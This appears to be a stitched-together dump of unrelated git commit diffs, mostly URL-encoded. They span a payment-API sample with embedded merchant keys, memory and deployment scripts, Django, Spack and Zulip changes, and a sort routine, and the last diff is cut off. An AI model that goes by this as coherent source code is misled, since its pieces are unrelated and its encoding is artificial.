CustomerProfiles/create-customer-payment-profile.py
|
CustomerProfiles/create-customer-payment-profile.py
|
Python
| 0.996976 |
@@ -0,0 +1,1239 @@
+from authorizenet import apicontractsv1%0Afrom authorizenet.apicontrollers import *%0A%0AmerchantAuth = apicontractsv1.merchantAuthenticationType()%0AmerchantAuth.name = '5KP3u95bQpv'%0AmerchantAuth.transactionKey = '4Ktq966gC55GAX7S'%0A%0AcreditCard = apicontractsv1.creditCardType()%0AcreditCard.cardNumber = %224111111111111111%22%0AcreditCard.expirationDate = %222020-12%22%0A%0Apayment = apicontractsv1.paymentType()%0Apayment.creditCard = creditCard%0A%0Aprofile = apicontractsv1.customerPaymentProfileType()%0Aprofile.payment = payment%0A%0AcreateCustomerPaymentProfile = apicontractsv1.createCustomerPaymentProfileRequest()%0AcreateCustomerPaymentProfile.merchantAuthentication = merchantAuth%0AcreateCustomerPaymentProfile.paymentProfile = profile%0AcreateCustomerPaymentProfile.customerProfileId = '36731856'%0A%0AcreateCustomerPaymentProfileController = createCustomerPaymentProfileController(createCustomerPaymentProfile)%0AcreateCustomerPaymentProfileController.execute()%0A%0Aresponse = createCustomerPaymentProfileController.getresponse()%0A%0Aif (response.messages.resultCode==%22Ok%22):%0A%09print %22Successfully created a customer payment profile with id: %25s%22 %25 response.customerPaymentProfileId%0Aelse:%0A%09print %22Failed to create customer payment profile %25s%22 %25 response.messages.message%5B0%5D.text%0A
|
|
f36a0d1d53b4a15d8ead51a54260946f293a8718
|
add mac free memory script
|
mac_free.py
|
mac_free.py
|
Python
| 0 |
@@ -0,0 +1,1226 @@
+#!/usr/bin/python%0A'''%0ACreated on Jun 1, 2014%0A %0A@author: jay%0A'''%0A %0Aimport subprocess%0Aimport re%0A %0A# Get process info%0Aps = subprocess.Popen(%5B'ps', '-caxm', '-orss,comm'%5D, stdout=subprocess.PIPE).communicate()%5B0%5D%0Avm = subprocess.Popen(%5B'vm_stat'%5D, stdout=subprocess.PIPE).communicate()%5B0%5D%0A %0A# Iterate processes%0AprocessLines = ps.split('%5Cn')%0Asep = re.compile('%5B%5Cs%5D+')%0ArssTotal = 0 # kB%0Afor row in range(1,len(processLines)):%0A rowText = processLines%5Brow%5D.strip()%0A rowElements = sep.split(rowText)%0A try:%0A rss = float(rowElements%5B0%5D) * 1024%0A except:%0A rss = 0 # ignore...%0A rssTotal += rss%0A %0A# Process vm_stat%0AvmLines = vm.split('%5Cn')%0Asep = re.compile(':%5B%5Cs%5D+')%0AvmStats = %7B%7D%0Afor row in range(1,len(vmLines)-2):%0A rowText = vmLines%5Brow%5D.strip()%0A rowElements = sep.split(rowText)%0A vmStats%5B(rowElements%5B0%5D)%5D = int(rowElements%5B1%5D.strip('%5C.')) * 4096%0A %0Aprint 'Wired Memory:%5Ct%5Ct%25d MB' %25 ( vmStats%5B%22Pages wired down%22%5D/1024/1024 )%0Aprint 'Active Memory:%5Ct%5Ct%25d MB' %25 ( vmStats%5B%22Pages active%22%5D/1024/1024 )%0Aprint 'Inactive Memory:%5Ct%25d MB' %25 ( vmStats%5B%22Pages inactive%22%5D/1024/1024 )%0Aprint 'Free Memory:%5Ct%5Ct%25d MB' %25 ( vmStats%5B%22Pages free%22%5D/1024/1024 )%0Aprint 'Real Mem Total (ps):%5Ct%25.3f MB' %25 ( rssTotal/1024/1024 )
|
|
375662aae4ab24444cbe0c8372c01ff8b8a08bc1
|
add a TODO
|
myriadeploy/create_deployment.py
|
myriadeploy/create_deployment.py
|
#!/usr/bin/env python
""" Create a Myria deployment file """
import sys
import argparse
from itertools import groupby
def get_deployment(path, coordinator_hostname, worker_hostnames, name='myria',
rest_port=8753, database_type='postgresql',
database_port=5432, heap='2g', debug=False,
database_username=None, database_password=None,
coordinator_port=9001, worker_ports=None,
worker_base_port=8001):
""" Generates a Myria deployment file with the given configuration """
return (_get_header(path, name, rest_port, database_type, database_port,
heap, debug, database_username, database_password) +
_get_coordinator(coordinator_hostname, coordinator_port) +
_get_workers(worker_hostnames, worker_ports, worker_base_port))
def _get_header(path, name='myria', rest_port=8753, database_type='postgresql',
database_port=5432, heap='2g', debug=False,
database_username=None, database_password=None):
""" Generates the header section of a Myria deployment file """
header = ('[deployment]\n'
'name = {name}\n'
'path = {path}\n'
'dbms = {dbms}\n'
'database_name = {name}\n'
'database_port = {database_port}\n'
'rest_port = {rest_port}\n'.format(
name=name, path=path, dbms=database_type,
database_port=database_port, rest_port=rest_port))
if database_username:
header += 'username = %s\n' % database_username
if database_password:
header += 'database_password = %s\n' % database_password
if heap:
header += 'max_heap_size = -Xmx%s\n' % heap
if debug:
header += 'debug_mode = True\n'
return header + '\n'
def _get_coordinator(hostname, port=9001):
""" Generates the coordinator section of a Myria deployment file """
return '[master]\n' \
'0 = {}:{}\n\n'.format(hostname, port)
def _get_workers(hostnames, ports=None, base_port=8001):
""" Generates the worker section of a Myria deployment file """
workers = '[workers]\n'
if not ports:
hostnames = sorted(hostnames)
ports = [offset + base_port
for hostname, group in groupby(hostnames)
for offset in xrange(len(list(group)))]
for index, (hostname, port) in enumerate(zip(hostnames, ports)):
workers += '{} = {}:{}\n'.format(index + 1, hostname, port)
return workers
def main(argv):
""" Argument parsing wrapper for generating a Myria deployment file """
parser = argparse.ArgumentParser(
description='Create a Myria deployment file')
parser.add_argument(
'path', type=str,
help='Installation path for catalog and worker metadata storage')
parser.add_argument(
'coordinator_hostname', metavar='coordinator', type=str,
help='Hostname for the coordinator')
parser.add_argument(
'worker_hostnames', metavar='workers', type=str, nargs='+',
help='One or more worker hostnames')
parser.add_argument(
'--worker-ports', dest='worker_ports', type=int, nargs='*',
default=None, help='One or more ports for worker communication')
parser.add_argument(
'--name', type=str, default='myria',
help='Name identifying this installation')
parser.add_argument(
'--rest-port', dest='rest_port', type=int, default=8753,
help='Port for REST requests')
parser.add_argument(
'--database-type', dest='database_type', type=str,
default='postgresql', help='Database type for Myria storage layer')
parser.add_argument(
'--database-port', dest='database_port', type=int, default='5432',
help='Port used to connect to storage layer')
parser.add_argument(
'--database-username', dest='database_username', type=str,
default=None, help='Username for connecting to storage layer')
parser.add_argument(
'--database-password', dest='database_password', type=str,
default=None, help='Password for connecting to storage layer')
parser.add_argument(
'--coordinator-port', dest='coordinator_port', type=int,
default=9001, help='Port for coordinator communication')
parser.add_argument(
'--worker-base-port', dest='worker_base_port', type=int,
default=8001, help='Base port for worker communication '
'(when worker-ports not specified)')
parser.add_argument(
'--heap', type=str, default='2g', help='Java VM heap size')
parser.add_argument(
'--debug', default=False, action='store_true',
help='Enable debugging support')
print get_deployment(**vars(parser.parse_args(argv[1:])))
if __name__ == "__main__":
main(sys.argv)
|
Python
| 0.000014 |
@@ -2416,16 +2416,108 @@
up)))%5D%0A%0A
+ # TODO: add support for specifying different directories and database names for workers%0A
for
|
d9be75200af8c63a4457b6fb6ee107f4e8aa1048
|
Create medium_BinaryConverter.py
|
medium_BinaryConverter.py
|
medium_BinaryConverter.py
|
Python
| 0.000001 |
@@ -0,0 +1,149 @@
+%22%22%22%0AConvert from binary string to%0Ainteger%0A%22%22%22%0Adef BinaryConverter(str): %0A return int(str,2)%0A %0A %0Aprint BinaryConverter(raw_input()) %0A
|
|
470ae84c10d889b725316f6f19b1049af0c87125
|
Fix Array class name
|
blaze/objects/array.py
|
blaze/objects/array.py
|
"""This file defines the Concrete Array --- a leaf node in the expression graph
A concrete array is constructed from a Data Descriptor Object which handles the
indexing and basic interpretation of bytes
"""
from __future__ import absolute_import, division, print_function
import datashape
from ..compute.expr import dump
from ..compute.ops import ufuncs
from .. import compute
from ..datadescriptor import (IDataDescriptor,
DyNDDataDescriptor,
DeferredDescriptor)
from ..io import _printing
class Array(object):
"""An Array contains:
DataDescriptor
Sequence of Bytes (where are the bytes)
Index Object (how do I get to them)
Data Shape Object (what are the bytes? how do I interpret them)
axis and dimension labels
user-defined meta-data (whatever are needed --- provenance propagation)
"""
def __init__(self, data, axes=None, labels=None, user={}):
if not isinstance(data, IDataDescriptor):
raise TypeError(('Constructing a blaze array directly '
'requires a data descriptor, not type '
'%r') % (type(data)))
self._data = data
self.axes = axes or [''] * (len(self._data.dshape) - 1)
self.labels = labels or [None] * (len(self._data.dshape) - 1)
self.user = user
self.expr = None
if isinstance(data, DeferredDescriptor):
# NOTE: we need 'expr' on the Array to perform dynamic programming:
# Two concrete arrays should have a single Op! We cannot
# store this in the data descriptor, since there are many
self.expr = data.expr # hurgh
# Inject the record attributes.
# This is a hack to help get the blaze-web server onto blaze arrays.
ms = data.dshape
if isinstance(ms, datashape.DataShape): ms = ms[-1]
if isinstance(ms, datashape.Record):
props = {}
for name in ms.names:
props[name] = _named_property(name)
self.__class__ = type('blaze.Array', (Array,), props)
# Need to inject attributes on the Array depending on dshape
# attributes, in cases other than Record
if data.dshape in [datashape.dshape('int32'), datashape.dshape('int64')]:
props = {}
def __int__(self):
# Evaluate to memory
e = compute.eval.eval(self)
return int(e._data.dynd_arr())
props['__int__'] = __int__
self.__class__ = type('blaze.Array', (Array,), props)
elif data.dshape in [datashape.dshape('float32'), datashape.dshape('float64')]:
props = {}
def __float__(self):
# Evaluate to memory
e = compute.eval.eval(self)
return float(e._data.dynd_arr())
props['__float__'] = __float__
self.__class__ = type('blaze.Array', (Array,), props)
elif ms in [datashape.complex_float32, datashape.complex_float64]:
props = {}
if len(data.dshape) == 1:
def __complex__(self):
# Evaluate to memory
e = compute.eval.eval(self)
return complex(e._data.dynd_arr())
props['__complex__'] = __complex__
props['real'] = _ufunc_to_property(ufuncs.real)
props['imag'] = _ufunc_to_property(ufuncs.imag)
self.__class__ = type('blaze.Array', (Array,), props)
@property
def dshape(self):
return self._data.dshape
@property
def deferred(self):
return self._data.capabilities.deferred
def view(self):
if not self.capabilities.deferred:
raise ValueError("Cannot call 'view' on a concrete array")
term, context = self.expr
ipython = False
try:
ipython = __IPYTHON__
except NameError:
pass
return dump(term, ipython=ipython)
def __array__(self):
import numpy as np
# TODO: Expose PEP-3118 buffer interface
if hasattr(self._data, "__array__"):
return np.array(self._data)
raise NotImplementedError(self._data)
def __iter__(self):
return self._data.__iter__()
def __getitem__(self, key):
return Array(self._data.__getitem__(key))
def __setitem__(self, key, val):
self._data.__setitem__(key, val)
def __len__(self):
shape = self.dshape.shape
if shape:
return shape[0]
return 1 # 0d
def __nonzero__(self):
if len(self.dshape.shape) == 0:
# Evaluate to memory
e = compute.eval.eval(self)
return bool(e._data.dynd_arr())
else:
raise ValueError("The truth value of an array with more than one "
"element is ambiguous. Use a.any() or a.all()")
def __str__(self):
return _printing.array_str(self)
def __repr__(self):
return _printing.array_repr(self)
def _named_property(name):
@property
def getprop(self):
return Array(self._data.getattr(name))
return getprop
def _ufunc_to_property(uf):
@property
def getprop(self):
return uf(self)
return getprop
def binding(f):
def binder(self, *args):
return f(self, *args)
return binder
def __rufunc__(f):
def __rop__(self, other):
return f(other, self)
return __rop__
def _inject_special_binary(names):
for ufunc_name, special_name in names:
ufunc = getattr(ufuncs, ufunc_name)
setattr(Array, '__%s__' % special_name, binding(ufunc))
setattr(Array, '__r%s__' % special_name, binding(__rufunc__(ufunc)))
def _inject_special(names):
for ufunc_name, special_name in names:
ufunc = getattr(ufuncs, ufunc_name)
setattr(Array, '__%s__' % special_name, binding(ufunc))
_inject_special_binary([
('add', 'add'),
('subtract', 'sub'),
('multiply', 'mul'),
('true_divide', 'truediv'),
('mod', 'mod'),
('floor_divide', 'floordiv'),
('equal', 'eq'),
('not_equal', 'ne'),
('greater', 'gt'),
('greater_equal', 'ge'),
('less_equal', 'le'),
('less', 'lt'),
('divide', 'div'),
('bitwise_and', 'and'),
('bitwise_or', 'or'),
('bitwise_xor', 'xor'),
('power', 'pow'),
])
_inject_special([
('bitwise_not', 'invert'),
('negative', 'neg'),
])
"""
These should be functions
@staticmethod
def fromfiles(list_of_files, converters):
raise NotImplementedError
@staticmethod
def fromfile(file, converter):
raise NotImplementedError
@staticmethod
def frombuffers(list_of_buffers, converters):
raise NotImplementedError
@staticmethod
def frombuffer(buffer, converter):
raise NotImplementedError
@staticmethod
def fromobjects():
raise NotImplementedError
@staticmethod
def fromiterator(buffer):
raise NotImplementedError
"""
|
Python
| 0.000059 |
@@ -2124,38 +2124,32 @@
class__ = type('
-blaze.
Array', (Array,)
@@ -2153,24 +2153,24 @@
y,), props)%0A
+
%0A # N
@@ -2606,38 +2606,32 @@
class__ = type('
-blaze.
Array', (Array,)
@@ -2983,38 +2983,32 @@
class__ = type('
-blaze.
Array', (Array,)
@@ -3506,16 +3506,16 @@
s.imag)%0A
+
@@ -3545,14 +3545,8 @@
pe('
-blaze.
Arra
|
73cfd55b6db4e8623ff7c5f8d0df7433e694f8c4
|
Split dottable-dict logic into separate class.
|
metadatastore/document.py
|
metadatastore/document.py
|
import six
import mongoengine
from mongoengine.base.datastructures import BaseDict, BaseList
from mongoengine.base.document import BaseDocument
from bson.objectid import ObjectId
from datetime import datetime
from itertools import chain
from collections import MutableMapping
def _normalize(in_val):
"""
Helper function for cleaning up the mongoegine documents to be safe.
Converts Mongoengine.Document to mds.Document objects recursively
Converts:
- mongoengine.base.datastructures.BaseDict -> dict
- mongoengine.base.datastructures.BaseList -> list
- ObjectID -> str
Parameters
----------
in_val : object
Object to be sanitized
Returns
-------
ret : object
The 'sanitized' object
"""
if isinstance(in_val, BaseDocument):
return Document(in_val)
elif isinstance(in_val, BaseDict):
return {_normalize(k): _normalize(v) for k, v in six.iteritems(in_val)}
elif isinstance(in_val, BaseList):
return [_normalize(v) for v in in_val]
elif isinstance(in_val, ObjectId):
return str(in_val)
return in_val
class Document(MutableMapping):
"""
Copy the data out of a mongoengine.Document, including nested Documents,
but do not copy any of the mongo-specific methods or attributes.
"""
def __init__(self, mongo_document):
"""
Parameters
----------
mongo_document : mongoengine.Document
"""
self._fields = set()
self._name = mongo_document.__class__.__name__
fields = set(chain(mongo_document._fields.keys(),
mongo_document._data.keys()))
for field in fields:
attr = getattr(mongo_document, field)
attr = _normalize(attr)
setattr(self, field, attr)
# For debugging, add a human-friendly time_as_datetime attribute.
if hasattr(self, 'time'):
self.time_as_datetime = datetime.fromtimestamp(self.time)
def __setattr__(self, k, v):
self.__dict__[k] = v
if not k.startswith('_'):
self._fields.add(k)
assert hasattr(self, k)
assert k in self.__dict__
def __delattr__(self, k):
del self.__dict__[k]
if not k.startswith('_'):
self._fields.remove(k)
assert k not in self._fields
def __repr__(self):
return "<{0} Document>".format(self._name)
def __iter__(self):
return iter(self._fields)
def __getitem__(self, key):
try:
return getattr(self, key)
except AttributeError:
raise KeyError(key)
def __delitem__(self, key):
delattr(self, key)
assert key not in self._fields
def __setitem__(self, key, val):
setattr(self, key, val)
def __len__(self):
return len(self._fields)
def __contains__(self, key):
return key in self._fields
|
Python
| 0 |
@@ -1137,22 +1137,36 @@
class Do
-cument
+ttableMutableMapping
(Mutable
@@ -1186,796 +1186,93 @@
%22%22%22
-%0A Copy the data out of a mongoengine.Document, including nested Documents,%0A but do not copy any of the mongo-specific methods or attributes.%0A %22%22%22%0A def __init__(self, mongo_document):%0A %22%22%22%0A Parameters%0A ----------%0A mongo_document : mongoengine.Document%0A %22%22%22%0A self._fields = set()%0A self._name = mongo_document.__class__.__name__%0A fields = set(chain(mongo_document._fields.keys(),%0A mongo_document._data.keys()))%0A%0A for field in fields:%0A attr = getattr(mongo_document, field)%0A%0A attr = _normalize(attr)%0A%0A setattr(self, field, attr)%0A # For debugging, add a human-friendly time_as_datetime attribute.%0A if hasattr(self, 'time'):%0A
+A dictionary where d.key is the same as d%5B'key'%5D%22%22%22%0A%0A def __init__(self):%0A
s
@@ -1271,67 +1271,27 @@
-
self.
-time_as_datetime = datetime.fromtimestamp(self.time
+_fields = set(
)%0A%0A
@@ -1654,84 +1654,8 @@
ds%0A%0A
- def __repr__(self):%0A return %22%3C%7B0%7D Document%3E%22.format(self._name)%0A%0A
@@ -1918,47 +1918,8 @@
key)
-%0A assert key not in self._fields
%0A%0A
@@ -2095,24 +2095,1010 @@
urn key in self._fields%0A
+%0A%0Aclass Document(DottableMutableMapping):%0A %22%22%22%0A Copy the data out of a mongoengine.Document, including nested Documents,%0A but do not copy any of the mongo-specific methods or attributes.%0A %22%22%22%0A def __init__(self, mongo_document):%0A %22%22%22%0A Parameters%0A ----------%0A mongo_document : mongoengine.Document%0A %22%22%22%0A super(Document, self).__init__()%0A self._name = mongo_document.__class__.__name__%0A fields = set(chain(mongo_document._fields.keys(),%0A mongo_document._data.keys()))%0A%0A for field in fields:%0A attr = getattr(mongo_document, field)%0A%0A attr = _normalize(attr)%0A%0A setattr(self, field, attr)%0A # For debugging, add a human-friendly time_as_datetime attribute.%0A if hasattr(self, 'time'):%0A self.time_as_datetime = datetime.fromtimestamp(self.time)%0A%0A def __repr__(self):%0A return %22%3C%7B0%7D Document%3E%22.format(self._name)%0A
|
b9034ca499ae8c0366ac8cd5ee71641f39c0ffba
|
Add taxonomy model and initiation
|
website/project/taxonomies/__init__.py
|
website/project/taxonomies/__init__.py
|
Python
| 0.000001 |
@@ -0,0 +1,1581 @@
+import json%0Aimport os%0A%0Afrom website import settings%0A%0Afrom modularodm import fields, Q%0Afrom modularodm.exceptions import NoResultsFound%0A%0Afrom framework.mongo import (%0A ObjectId,%0A StoredObject,%0A utils as mongo_utils%0A)%0A%0A%0A@mongo_utils.unique_on(%5B'id', '_id'%5D)%0Aclass Subject(StoredObject):%0A _id = fields.StringField(primary=True, default=lambda: str(ObjectId()))%0A%0A type = fields.StringField(required=True)%0A text = fields.StringField(required=True)%0A parent = fields.ForeignField('subject', index=True)%0A%0A%0Adef ensure_taxonomies():%0A with open(%0A os.path.join(%0A settings.APP_PATH,%0A 'website', 'static', 'plos_taxonomy.json'%0A )%0A ) as fp:%0A taxonomy = json.load(fp)%0A # For now, only PLOS taxonomies are loaded, other types possibly considered in the future%0A type = 'plos'%0A for subject_path in taxonomy.get('data'):%0A subjects = subject_path.split('_')%0A text = subjects%5B-1%5D%0A parent = None%0A if len(subjects) %3E 1:%0A parent = subjects%5B-2%5D%0A%0A try:%0A subject = Subject.find_one(%0A Q('text', 'eq', text) &%0A Q('type', 'eq', type)%0A )%0A except NoResultsFound:%0A subject = Subject(%0A type = type,%0A text = text,%0A parent = parent%0A )%0A else:%0A subject.type = type%0A subject.text = text%0A subject.parent = parent%0A subject.save()
|
|
e747714e16250f3c2e85d09520f36953b1c417c3
|
Create HeapSort.py
|
Algorithms/Sort_Algorithms/Heap_Sort/HeapSort.py
|
Algorithms/Sort_Algorithms/Heap_Sort/HeapSort.py
|
Python
| 0.000001 |
@@ -0,0 +1,1165 @@
+# Python program for implementation of heap Sort%0A %0A# To heapify subtree rooted at index i.%0A# n is size of heap%0Adef heapify(arr, n, i):%0A largest = i # Initialize largest as root%0A l = 2 * i + 1 # left = 2*i + 1%0A r = 2 * i + 2 # right = 2*i + 2%0A %0A # See if left child of root exists and is%0A # greater than root%0A if l %3C n and arr%5Bi%5D %3C arr%5Bl%5D:%0A largest = l%0A %0A # See if right child of root exists and is%0A # greater than root%0A if r %3C n and arr%5Blargest%5D %3C arr%5Br%5D:%0A largest = r%0A %0A # Change root, if needed%0A if largest != i:%0A arr%5Bi%5D,arr%5Blargest%5D = arr%5Blargest%5D,arr%5Bi%5D # swap%0A %0A # Heapify the root.%0A heapify(arr, n, largest)%0A %0A# The main function to sort an array of given size%0Adef heapSort(arr):%0A n = len(arr)%0A %0A # Build a maxheap.%0A for i in range(n, -1, -1):%0A heapify(arr, n, i)%0A %0A # One by one extract elements%0A for i in range(n-1, 0, -1):%0A arr%5Bi%5D, arr%5B0%5D = arr%5B0%5D, arr%5Bi%5D # swap%0A heapify(arr, i, 0)%0A %0A# Driver code to test above%0Aarr = %5B 12, 11, 13, 5, 6, 7%5D%0AheapSort(arr)%0An = len(arr)%0Aprint (%22Sorted array is%22)%0Afor i in range(n):%0A print (%22%25d%22 %25arr%5Bi%5D),%0A
|
|
5c0730d7caef6503e3f97849d9df6825c289e9a0
|
Fix check for valid emoji.
|
zerver/views/reactions.py
|
zerver/views/reactions.py
|
from __future__ import absolute_import
from django.http import HttpRequest, HttpResponse
from django.utils.translation import ugettext as _
from typing import Text
from zerver.decorator import authenticated_json_post_view,\
has_request_variables, REQ, to_non_negative_int
from zerver.lib.actions import do_add_reaction, do_remove_reaction
from zerver.lib.bugdown import emoji_list
from zerver.lib.message import access_message
from zerver.lib.request import JsonableError
from zerver.lib.response import json_success
from zerver.models import Reaction, UserProfile
@has_request_variables
def add_reaction_backend(request, user_profile, message_id, emoji_name):
# type: (HttpRequest, UserProfile, int, Text) -> HttpResponse
# access_message will throw a JsonableError exception if the user
# cannot see the message (e.g. for messages to private streams).
message = access_message(user_profile, message_id)[0]
existing_emojis = set(message.sender.realm.get_emoji().keys()) or set(emoji_list)
if emoji_name not in existing_emojis:
raise JsonableError(_("Emoji '%s' does not exist" % (emoji_name,)))
# We could probably just make this check be a try/except for the
# IntegrityError from it already existing, but this is a bit cleaner.
if Reaction.objects.filter(user_profile=user_profile,
message=message,
emoji_name=emoji_name).exists():
raise JsonableError(_("Reaction already exists"))
do_add_reaction(user_profile, message, emoji_name)
return json_success()
@has_request_variables
def remove_reaction_backend(request, user_profile, message_id, emoji_name):
# type: (HttpRequest, UserProfile, int, Text) -> HttpResponse
# access_message will throw a JsonableError exception if the user
# cannot see the message (e.g. for messages to private streams).
message = access_message(user_profile, message_id)[0]
existing_emojis = set(message.sender.realm.get_emoji().keys()) or set(emoji_list)
if emoji_name not in existing_emojis:
raise JsonableError(_("Emoji '%s' does not exist" % (emoji_name,)))
# We could probably just make this check be a try/except for the
# IntegrityError from it already existing, but this is a bit cleaner.
if not Reaction.objects.filter(user_profile=user_profile,
message=message,
emoji_name=emoji_name).exists():
raise JsonableError(_("Reaction does not exist"))
do_remove_reaction(user_profile, message, emoji_name)
return json_success()
|
Python
| 0.000062 |
@@ -551,16 +551,23 @@
eaction,
+ Realm,
UserPro
@@ -572,16 +572,280 @@
rofile%0A%0A
+def check_valid_emoji(realm, emoji_name):%0A # type: (Realm, Text) -%3E None%0A if emoji_name in set(realm.get_emoji().keys()):%0A return%0A if emoji_name in emoji_list:%0A return%0A raise JsonableError(_(%22Emoji '%25s' does not exist%22 %25 (emoji_name,)))%0A%0A
@has_req
@@ -1205,193 +1205,48 @@
-existing_emojis = set(message.sender.realm.get_emoji().keys()) or set(emoji_list)%0A if emoji_name not in existing_emojis:%0A raise JsonableError(_(%22Emoji '%25s' does not exist%22 %25 (
+check_valid_emoji(message.sender.realm,
emoj
@@ -1243,35 +1243,32 @@
ealm, emoji_name
-,))
)%0A%0A # We coul
@@ -2081,193 +2081,48 @@
-existing_emojis = set(message.sender.realm.get_emoji().keys()) or set(emoji_list)%0A if emoji_name not in existing_emojis:%0A raise JsonableError(_(%22Emoji '%25s' does not exist%22 %25 (
+check_valid_emoji(message.sender.realm,
emoj
@@ -2127,19 +2127,16 @@
oji_name
-,))
)%0A%0A #
|
17fcfd6d1962b23429d48a8a45dfb0944c2f1453
|
Add constraints.py
|
conference_scheduler/constraints.py
|
conference_scheduler/constraints.py
|
Python
| 0.000003 |
@@ -0,0 +1,165 @@
+from typing import Callable, List, Dict%0A%0A%0Aclass Constraint(NamedTuple):%0A function: Callable%0A args: List%0A kwargs: Dict%0A operator: Callable%0A value: int%0A
|
|
e9efb5e2ba19fcda77e35d0efdaa03b13d025df0
|
create model of a feature
|
devmine/app/models/feature.py
|
devmine/app/models/feature.py
|
Python
| 0.000001 |
@@ -0,0 +1,322 @@
+from sqlalchemy import (%0A Column,%0A Integer,%0A String%0A)%0A%0Afrom devmine.app.models import Base%0A%0A%0Aclass Feature(Base):%0A %22%22%22Model of a feature.%22%22%22%0A%0A __tablename__ = 'features'%0A%0A id = Column(Integer, primary_key=True)%0A name = Column(String, nullable=False, unique=True)%0A%0A def __init__(self):%0A pass%0A
|
|
7491f500c75850c094158b4621fdef602bce3d27
|
Add benchmarks for custom generators
|
benchmarks/benchmarks/benchmark_custom_generators.py
|
benchmarks/benchmarks/benchmark_custom_generators.py
|
Python
| 0 |
@@ -0,0 +1,1776 @@
+from tohu.v6.primitive_generators import Integer, HashDigest, FakerGenerator%0Afrom tohu.v6.derived_generators import Apply, Lookup, SelectOne, SelectMultiple%0Afrom tohu.v6.custom_generator import CustomGenerator%0A%0Afrom .common import NUM_PARAMS%0A%0A%0Amapping = %7B%0A 'A': %5B'a', 'aa', 'aaa', 'aaaa', 'aaaaa'%5D,%0A 'B': %5B'b', 'bb', 'bbb', 'bbbb', 'bbbbb'%5D,%0A 'C': %5B'c', 'cc', 'ccc', 'cccc', 'ccccc'%5D,%0A 'D': %5B'd', 'dd', 'ddd', 'dddd', 'ddddd'%5D,%0A 'E': %5B'e', 'ee', 'eee', 'eeee', 'eeeee'%5D,%0A 'F': %5B'f', 'ff', 'fff', 'ffff', 'fffff'%5D,%0A 'G': %5B'g', 'gg', 'ggg', 'gggg', 'ggggg'%5D,%0A%7D%0A%0Aclass Quux1Generator(CustomGenerator):%0A aa = Integer(100, 200)%0A bb = HashDigest(length=8)%0A cc = FakerGenerator(method=%22name%22)%0A%0A%0Aclass Quux2Generator(CustomGenerator):%0A aa = SelectOne(%5B'A', 'B', 'C', 'D', 'E', 'F', 'G'%5D)%0A ll = Lookup(key=aa, mapping=mapping)%0A nn = Integer(1, 5)%0A bb = SelectMultiple(ll, num=nn)%0A%0A%0Aclass Quux3Generator(CustomGenerator):%0A bb = SelectMultiple(Lookup(SelectOne(%5B'A', 'B', 'C', 'D', 'E', 'F', 'G'%5D), mapping), num=Integer(1, 5))%0A%0A%0Aclass TimeBasicCustomGenerator:%0A%0A params = NUM_PARAMS%0A%0A def setup(self, num):%0A self.g1 = Quux1Generator()%0A%0A def time_basic_custom_generator(self, num):%0A self.g1.generate(num=num)%0A%0A%0Aclass TimeComplexCustomGeneratorWithExplicitlyNamedFields:%0A%0A params = NUM_PARAMS%0A%0A def setup(self, num):%0A self.g2 = Quux2Generator()%0A%0A def time_complex_custom_generator_with_explicitly_named_fields(self, num):%0A self.g2.generate(num=num)%0A%0A%0Aclass TimeComplexCustomGeneratorWithAnonymousFields:%0A params = NUM_PARAMS%0A%0A def setup(self, num):%0A self.g3 = Quux3Generator()%0A%0A def time_complex_custom_generator_with_anonymous_fields(self, num):%0A self.g3.generate(num=num)%0A
|
|
63d45b975d33227b65e79644622773a49dd7ccc6
|
Add new package: libxcrypt (#18783)
|
var/spack/repos/builtin/packages/libxcrypt/package.py
|
var/spack/repos/builtin/packages/libxcrypt/package.py
|
Python
| 0 |
@@ -0,0 +1,920 @@
+# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other%0A# Spack Project Developers. See the top-level COPYRIGHT file for details.%0A#%0A# SPDX-License-Identifier: (Apache-2.0 OR MIT)%0A%0Afrom spack import *%0A%0A%0Aclass Libxcrypt(AutotoolsPackage):%0A %22%22%22libxcrypt is a modern library for one-way hashing of passwords.%22%22%22%0A%0A homepage = %22https://github.com/besser82/libxcrypt%22%0A url = %22https://github.com/besser82/libxcrypt/archive/v4.4.17.tar.gz%22%0A%0A version('4.4.17', sha256='7665168d0409574a03f7b484682e68334764c29c21ca5df438955a381384ca07')%0A version('4.4.16', sha256='a98f65b8baffa2b5ba68ee53c10c0a328166ef4116bce3baece190c8ce01f375')%0A version('4.4.15', sha256='8bcdef03bc65f9dbda742e56820435b6f13eea59fb903765141c6467f4655e5a')%0A%0A depends_on('autoconf', type='build')%0A depends_on('automake', type='build')%0A depends_on('libtool', type='build')%0A depends_on('m4', type='build')%0A
|
|
465b83e394c2bb90a85580946e291d0249fc754e
|
Fix model fields label
|
apps/accounts/migrations/0005_auto_20160101_1840.py
|
apps/accounts/migrations/0005_auto_20160101_1840.py
|
Python
| 0.000001 |
@@ -0,0 +1,706 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('accounts', '0004_auto_20151227_1553'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='userprofile',%0A name='biography_text',%0A field=models.TextField(editable=False, verbose_name='Biography (raw text)', blank=True, default=''),%0A ),%0A migrations.AlterField(%0A model_name='userprofile',%0A name='signature_text',%0A field=models.TextField(editable=False, verbose_name='Signature (raw text)', blank=True, default=''),%0A ),%0A %5D%0A
|
|
6c599caaf8a4daadfe287898901cad54fda37875
|
add Post model
|
XdaPy/model/post.py
|
XdaPy/model/post.py
|
Python
| 0 |
@@ -0,0 +1,1339 @@
+# Copyright (C) 2014 cybojenix %[email protected]%3E%0A#%0A# This file is part of XdaPy.%0A#%0A# XdaPy is free software: you can redistribute it and/or modify%0A# it under the terms of the GNU General Public License as published by%0A# the Free Software Foundation, either version 3 of the License, or%0A# (at your option) any later version.%0A%0A# XdaPy is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the%0A# GNU General Public License for more details.%0A#%0A# You should have received a copy of the GNU General Public License%0A# along with XdaPy. If not, see %3Chttp://www.gnu.org/licenses/%3E.%0A%0A%0Aclass Post(object):%0A def __init__(self, data):%0A if data is None:%0A data = %7B%7D%0A assert hasattr(data, %22get%22)%0A self.post_id = data.get(%22postid%22, %22%22)%0A self.visible = bool(data.get(%22visible%22))%0A self.user_id = data.get(%22userid%22, %22%22)%0A self.title = data.get(%22title%22, %22%22)%0A self.page_text = data.get(%22pagetext%22, %22%22)%0A self.username = data.get(%22username%22, %22%22)%0A self.date_line = data.get(%22dateline%22, %22%22)%0A self.avatar_url = 